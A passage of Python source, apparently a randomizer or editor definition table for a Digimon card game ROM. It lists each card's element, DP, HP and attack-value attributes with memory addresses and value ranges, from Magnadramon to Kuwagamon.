number_of_bytes=2,
min_value=Min_Triangle_Multiplier(610,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(610,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
#Magndramons cross isn't in a predictable place for some reason, lots fo random text in between
Attribute(
name="Magnadramon Cross",
addresses=[0x266980C],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,4),
max_value=Max_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Cross Effect",
addresses=[0x2669898],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#AeroVeedramon 072
Attribute(
name="AeroVeedramon Element",
addresses=[0x266990a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 72),
max_value=Get_Element_Type(32, 3, 72),
is_little_endian=True, ),
Attribute(
name="AeroVeedramon +DP",
addresses=[0x266990c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="AeroVeedramon HP",
addresses=[0x266990e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1430,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1430,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Circle",
addresses=[0x2669910],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(750,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(750,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Triangle",
addresses=[0x266992c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Cross",
addresses=[0x2669948],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(360,nature_special_modifier,ultimate_modifier,1),
max_value=Max_Cross_Multiplier(360,nature_special_modifier,ultimate_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="AeroVeedramon Cross Effect",
addresses=[0x26699d4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Rosemon 073
Attribute(
name="Rosemon Element",
addresses=[0x2669a46],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 73),
max_value=Get_Element_Type(32, 3, 73),
is_little_endian=True, ),
Attribute(
name="Rosemon +DP",
addresses=[0x2669a48],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Rosemon HP",
addresses=[0x2669a4a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1210,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1210,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Circle",
addresses=[0x2669a4c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Triangle",
addresses=[0x2669a68],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Cross",
addresses=[0x2669a84],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,9),
max_value=Max_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,9),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Rosemon Cross Effect",
addresses=[0x2669b10],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#HerculesKabuterimon 074
Attribute(
name="HerculesKabuterimon Element",
addresses=[0x2669b82],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 74),
max_value=Get_Element_Type(32, 3, 74),
is_little_endian=True, ),
Attribute(
name="HerculesKabuterimon +DP",
addresses=[0x2669b84],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon HP",
addresses=[0x2669b86],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1700,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1700,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Circle",
addresses=[0x2669b88],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(790,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(790,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Triangle",
addresses=[0x2669ba4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(490,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(490,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Cross",
addresses=[0x2669bc0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,nature_special_modifier,ultimate_modifier,1),
max_value=Max_Cross_Multiplier(250,nature_special_modifier,ultimate_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="HerculesKabuterimon Cross Effect",
addresses=[0x2669c4c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MagnaAngemon 075
Attribute(
name="MagnaAngemon Element",
addresses=[0x2669cbe],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 75),
max_value=Get_Element_Type(32, 3, 75),
is_little_endian=True, ),
Attribute(
name="MagnaAngemon +DP",
addresses=[0x2669cc0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MagnaAngemon HP",
addresses=[0x2669cc2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1320,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1320,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Circle",
addresses=[0x2669cc4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(770,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(770,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Triangle",
addresses=[0x2669ce0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(570,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(570,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Cross",
addresses=[0x2669CFC],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(370,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MagnaAngemon Cross Effect",
addresses=[0x2669d88],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Silphymon 076
Attribute(
name="Silphymon Element",
addresses=[0x2669dfa],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 76),
max_value=Get_Element_Type(32, 3, 76),
is_little_endian=True, ),
Attribute(
name="Silphymon +DP",
addresses=[0x2669dfc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Silphymon HP",
addresses=[0x2669dfe],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1540,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1540,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Circle",
addresses=[0x2669e00],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(680,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(680,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Triangle",
addresses=[0x2669e1c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(500,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(500,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Cross",
addresses=[0x2669e38],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,nature_special_modifier,ultimate_modifier,3),
max_value=Max_Cross_Multiplier(400,nature_special_modifier,ultimate_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Silphymon Cross Effect",
addresses=[0x2669ec4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Angewomon 077
Attribute(
name="Angewomon Element",
addresses=[0x2669f36],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 77),
max_value=Get_Element_Type(32, 3, 77),
is_little_endian=True, ),
Attribute(
name="Angewomon +DP",
addresses=[0x2669f38],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Angewomon HP",
addresses=[0x2669f3a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Circle",
addresses=[0x2669f3c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(720,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Triangle",
addresses=[0x2669f58],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(520,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(520,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Cross",
addresses=[0x2669f74],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(330,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(330,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angewomon Cross Effect",
addresses=[0x266a000],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Lillymon 078
Attribute(
name="Lillymon Element",
addresses=[0x266a1a2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 78),
max_value=Get_Element_Type(32, 3, 78),
is_little_endian=True, ),
Attribute(
name="Lillymon +DP",
addresses=[0x266a1a4],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Lillymon HP",
addresses=[0x266a1a6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1100,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1100,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Circle",
addresses=[0x266a1a8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Triangle",
addresses=[0x266a1c4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(340,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(340,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Cross",
addresses=[0x266a1e0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,ultimate_modifier,9),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,ultimate_modifier,9),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Lillymon Cross Effect",
addresses=[0x266a26c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MegaKabuterimon 079
Attribute(
name="MegaKabuterimon Element",
addresses=[0x266a2de],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 79),
max_value=Get_Element_Type(32, 3, 79),
is_little_endian=True, ),
Attribute(
name="MegaKabuterimon +DP",
addresses=[0x266a2e0],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon HP",
addresses=[0x266a2e2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1480,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1480,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Circle",
addresses=[0x266a2e4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Triangle",
addresses=[0x266a300],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(400,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(400,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Cross",
addresses=[0x266a31c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,ultimate_modifier,5),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,ultimate_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaKabuterimon Cross Effect",
addresses=[0x266a3a8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Piximon 080
Attribute(
name="Piximon Element",
addresses=[0x266a41a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 80),
max_value=Get_Element_Type(32, 3, 80),
is_little_endian=True, ),
Attribute(
name="Piximon +DP",
addresses=[0x266a41c],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Piximon HP",
addresses=[0x266a41e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1370,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Circle",
addresses=[0x266a420],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(670,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(670,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Triangle",
addresses=[0x266a43c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(430,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(430,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Cross",
addresses=[0x266a458],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,0),
max_value=Max_Cross_Multiplier(320,nature_special_modifier,ultimate_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Piximon Cross Effect",
addresses=[0x266a4e4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Veedramon 081
Attribute(
name="Veedramon Element",
addresses=[0x266a556],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 81),
max_value=Get_Element_Type(32, 2, 81),
is_little_endian=True, ),
Attribute(
name="Veedramon +DP",
addresses=[0x266a558],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Veedramon HP",
addresses=[0x266a55a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(880,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(880,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Circle",
addresses=[0x266a55c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(500,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(500,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Triangle",
addresses=[0x266a578],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Cross",
addresses=[0x266a594],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,champion_modifier,1),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,champion_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Veedramon Cross Effect",
addresses=[0x266a620],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Angemon 082
Attribute(
name="Angemon Element",
addresses=[0x266a692],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 82),
max_value=Get_Element_Type(32, 2, 82),
is_little_endian=True, ),
Attribute(
name="Angemon +DP",
addresses=[0x266a694],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Angemon HP",
addresses=[0x266a696],
number_of_bytes=2,
min_value=Min_HP_Multiplier(940,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(940,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Circle",
addresses=[0x266a698],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Triangle",
addresses=[0x266a6b4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Cross",
addresses=[0x266a6d0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(260,nature_special_modifier,champion_modifier,14),
max_value=Max_Cross_Multiplier(260,nature_special_modifier,champion_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Angemon Cross Effect",
addresses=[0x266a75c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#R-Gatomon 083
Attribute(
name="R-Gatomon Element",
addresses=[0x266a7ce],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 83),
max_value=Get_Element_Type(32, 2, 83),
is_little_endian=True, ),
Attribute(
name="R-Gatomon +DP",
addresses=[0x266a7d0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="R-Gatomon HP",
addresses=[0x266a7d2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(750,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(750,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Circle",
addresses=[0x266a7d4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(410,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(410,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Triangle",
addresses=[0x266a7f0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(300,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Cross",
addresses=[0x266a80c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,nature_special_modifier,champion_modifier,4),
max_value=Max_Cross_Multiplier(210,nature_special_modifier,champion_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Cross Effect",
addresses=[0x266a898],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Togemon 084
Attribute(
name="Togemon Element",
addresses=[0x266a90a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 84),
max_value=Get_Element_Type(32, 2, 84),
is_little_endian=True, ),
Attribute(
name="Togemon +DP",
addresses=[0x266a90c],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Togemon HP",
addresses=[0x266a90e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(800,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(800,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Circle",
addresses=[0x266a910],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(380,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(380,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Triangle",
addresses=[0x266a92c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Cross",
addresses=[0x266AA78],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,nature_special_modifier,champion_modifier,3),
max_value=Max_Cross_Multiplier(170,nature_special_modifier,champion_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Cross Effect",
addresses=[0x266AB04],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Leomon 085
Attribute(
name="Leomon Element",
addresses=[0x266ab76],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 85),
max_value=Get_Element_Type(32, 2, 85),
is_little_endian=True, ),
Attribute(
name="Leomon +DP",
addresses=[0x266ab78],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Leomon HP",
addresses=[0x266ab7a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(890,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(890,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Circle",
addresses=[0x266ab7c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Triangle",
addresses=[0x266ab98],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(280,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(280,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Cross",
addresses=[0x266abb4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Cross Effect",
addresses=[0x266ac40],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kabuterimon 086
Attribute(
name="Kabuterimon Element",
addresses=[0x266acb2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 86),
max_value=Get_Element_Type(32, 2, 86),
is_little_endian=True, ),
Attribute(
name="Kabuterimon +DP",
addresses=[0x266acb4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Kabuterimon HP",
addresses=[0x266acb6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Circle",
addresses=[0x266acb8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(550,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(550,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Triangle",
addresses=[0x266acd4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Cross",
addresses=[0x266acf0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Cross Effect",
addresses=[0x266ad7c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Airdramon 087
Attribute(
name="Airdramon Element",
addresses=[0x266adee],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 87),
max_value=Get_Element_Type(32, 2, 87),
is_little_endian=True, ),
Attribute(
name="Airdramon +DP",
addresses=[0x266adf0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Airdramon HP",
addresses=[0x266adf2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Circle",
addresses=[0x266adf4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Triangle",
addresses=[0x266ae10],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Cross",
addresses=[0x266ae2c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(50,nature_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(50,nature_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Cross Effect",
addresses=[0x266aeb8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Unimon 088
Attribute(
name="Unimon Element",
addresses=[0x266af2a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 88),
max_value=Get_Element_Type(32, 2, 88),
is_little_endian=True, ),
Attribute(
name="Unimon +DP",
addresses=[0x266af2c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Unimon HP",
addresses=[0x266af2e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Circle",
addresses=[0x266af30],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Triangle",
addresses=[0x266af4c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(210,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(210,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Cross",
addresses=[0x266af68],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,nature_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(150,nature_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Cross Effect",
addresses=[0x266aff4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Ninjamon 089
Attribute(
name="Ninjamon Element",
addresses=[0x266b066],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 89),
max_value=Get_Element_Type(32, 2, 89),
is_little_endian=True, ),
Attribute(
name="Ninjamon +DP",
addresses=[0x266b068],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Ninjamon HP",
addresses=[0x266b06a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(650,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(650,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Circle",
addresses=[0x266b06c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(440,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(440,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Triangle",
addresses=[0x266b088],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(350,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(350,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Cross",
addresses=[0x266b0a4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,nature_special_modifier,champion_modifier,1),
max_value=Max_Cross_Multiplier(250,nature_special_modifier,champion_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Cross Effect",
addresses=[0x266b130],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kuwagamon 090
Attribute(
name="Kuwagamon Element",
addresses=[0x266b1a2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 90),
max_value=Get_Element_Type(32, 2, 90),
is_little_endian=True, ),
Attribute(
